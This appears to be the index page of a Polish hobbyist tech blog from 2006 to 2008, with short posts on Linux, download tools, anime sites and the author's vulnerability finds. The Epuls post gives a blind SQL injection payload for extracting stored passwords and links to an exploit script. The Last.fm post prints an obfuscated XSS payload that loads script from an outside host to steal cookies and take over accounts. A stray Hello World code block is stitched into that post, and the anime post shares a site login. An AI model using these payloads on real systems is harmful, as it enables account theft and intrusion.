Half a year ago I accidentally spilled soda on my laptop keyboard. Of course I’ve cleaned and dried it but once in a while some keys press themselves. The issue became annoying when I was watching movies and mplayer just kept turning off. I didn’t want to replace broken keyboard, because I already use usb one. I spend half a day investigating and as it came out it’s not all that easy to turn off laptop keyboard.
XSS Challenges
•marzec 30, 2008 • 5 komentarzyWszystkim chcącym poszerzyć/sprawdzić swoją wiedzę dotczącą Cross Site Scripting zachęcam do zabawy z http://xss-quiz.int21h.jp/
Zadania nie są trudne, a podobne sytuacje zdarzają się na prawdziwych stronach. Powodzenia!
Epuls.pl odcinek II
•grudzień 9, 2007 • 59 komentarzyEpulsem miałem się już nie zajmować. Dostałem jednak maila o tym, że wprowadzone zostały nowe funkcje. Jak wiadomo, nowe funkcje to nowe błędy, nie mogłem więc takiej okazji przegapić.
EraGG
•listopad 24, 2007 • 3 komentarzyZryczałtowane usługi są fajne, nieważne ile się korzysta, zawsze płaci się tyle samo. Podobnie jest z EraGG. Za cenę 1zł otrzymujemy tygodniowy dostęp do naszego gg z telefonu komorkowego. Niestety, na liście kontaktów możemy mieć tylko 20 użytkowników, a wiadomości muszą być krótsze niż 200 znaków. Ponadto jesteśmy zmuszeni do oglądania reklamy, której przypadkowe naciśnięcie kosztuje nas dodatkowe pieniądze.
Oczywiście nie musi tak być, można przecież stworzyć alternatywną aplikację kliencką! Czytaj dalej ‘EraGG’
DownThemAll!
•wrzesień 16, 2007 • 3 komentarzyDownload manager w Firefoksie nie obsługuje ani wznawiania ściągania, ani jego akcerelacji. Wget nie potrafi dzielić pliku na części i nie obsługuje dynamicznej kolejki ściągania. Aget obsługuje akcereracje ale jest w wczesnej fazie rozwoju i nie obsługuje proxy. Czy użytkownicy Linuksa mogą tylko marzyc o funkcjonalności znanej z Flashgeta? otóż okazuje się, ze nie. Z pomocą przychodzi DownThemAll!
Slackware 12
•wrzesień 14, 2007 • Dodaj komentarzPo dwoch latach obcowania z Slackware 10.2 przyszedl czas na upgrade. Rozwazalem opcje uzywania Gentoo, lecz po miesiacu uzywania stwierdzilem, ze jest to wspaniala dystrybucja ale niestety do mnie nie pasuje (albo ja do niej). Tak wiec padlo na nowego Slacka.
Ogolne wrazenie:
Epuls.pl hack
•wrzesień 12, 2007 • 203 komentarzyPo dwóch miesiącach wreszcie się doczekałem załatania dziury, którą
znalazłem w http://epuls.pl . Niestety mimo moich wielokrotnych prób
nie uzyskałem odpowiedzi od załogi epulsa.
Na czym polegala dziura?
Każdy użytkownik na epulsie tworzy własna stronę profilu. Do
dyspozycji ma kilka standardowych tagów formatowania tekstu oraz dwa
tagi, które wzbudziły moją uwagę: <link> oraz <club> . Pierwszy tworzy link do użytkownika, a drugi do
klubu. Jak się okazało oba te tagi były podatne na sql injection. Co mnie bardziej zaskoczylo to to ze hasla przechowywane sa w postaci niezaszyfrowanej. Kod:
<link>carmen' and strPassword>'jakieshaslo' #</link>
generował poprawny link jeśli hasło użytkownika carmen jest
leksykograficznie dalej niż ‘jakieshaslo’.
Przeszukując literka po literce można było bez problemu znaleźć hasło.
Teraz jeszcze filmik żeby nie było, że sobie zmyślam. (pozdrowienia
dla kolegi, który filmik nakręcil)
[14/02/2008]:
Tyle już otrzymałem próśb o filmik w lepszej wersji, że postanowiłem go wrzucić.
http://rapidshare.com/files/91783052/epuls.mov
Wrzucam też skrypt, o który prosiliście.
http://rapidshare.com/files/91786659/skrypt.tar.gz
Last.fm hack
•wrzesień 7, 2007 • Dodaj komentarzJeszcze przed wakacjami last.fm byl podatny na taki atak (lamania wiersza tylko dla czytelnosci):
[font=inherit;display:none;-moz-binding:
url('http://rotflcopter.rip3k.com/xssmoz.php#xss');][/font]
[font=inherit;background-image:url(javascript:
eval('%76%61%72%20%61%3D%64%6F%63%75%6D%65%6E%74
%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%22
%73%63%72%69%70%74%22%29%3B%76%61%72%20%78%78%3D
%61%2E%73%72%63%3D%22%68%74%74%70%3A%2F%2F%72%6F
%74%66%6C%63%6F%70%74%65%72%2E%72%69%70%33%6B%2E
%63%6F%6D%2F%6C%6F%6C%66%72%2E%70%68%70%22%3B%76
%61%72%20%79%3D%61%2E%74%79%70%65%3D%22%74%65%78
%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3B%76%61
%72%20%78%3D%64%6F%63%75%6D%65%6E%74%2E%67%65%74
%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D
%65%28%22%68%65%61%64%22%29%5B%30%5D%2E%61%70%70
%65%6E%64%43%68%69%6C%64%28%61%29%3B'));][/font]
public class Hello {
public static void main(String[] args) {
System.out.println("Hello World!");
}
}
Pierwsza linijka byla przygotowana dla przegladarek na silniku gecko, druga dzialala na ie oraz operze. Byla to luka pozwalajaca na CSS injection, z ktorego dzieki specyficznymi dla przegladarek bugami mozna bylo zrobic Javascript injection. Stad juz krotka droga do przechwytywania ciasteczek i w rezultacie przejecia kontroli nad kontem.
oto dyskusja z obsluga
Palmtop cz.2
•czerwiec 4, 2006 • Dodaj komentarzPodczas rozbierania laptopa zerwala sie tasma łaczaca ekranik z plyta glowna. Bede musial ja naprawic a jak na razie to zamiescilem krotki art o instalacji netbsd na tym urzadzonku.
Naruto i inne anime
•maj 5, 2006 • Dodaj komentarzOstatnio ogladalem duzo anime i znalazlem mnostwo stron z anime (no moze nie tak mnostwo ale idac linkami z tych stron ich ilosc rosnie wykladniczo ;] )
http://66.90.64.102/ uzytkownik NarutoALL haslo unitedtrans
http://www.narutochuushin.com potrzebna wlasna rejestracja
http://www.narutocommunity.net/ wspaniala strona, wspaniale forum, rejestracja
http://www.saiyanisland.com/ nowe odcinki w sredniej jakosci
http://realitylapse.com/ stad mialem prawie wszystkie odcinki naruto, ale ostatnio byly jakies problemy z serwerem w kazdym badz razie jesli dziala to polecam
http://free.hentaicenter.pl/ to juz calkiem przypadkiem tak sie znalazlo ;p
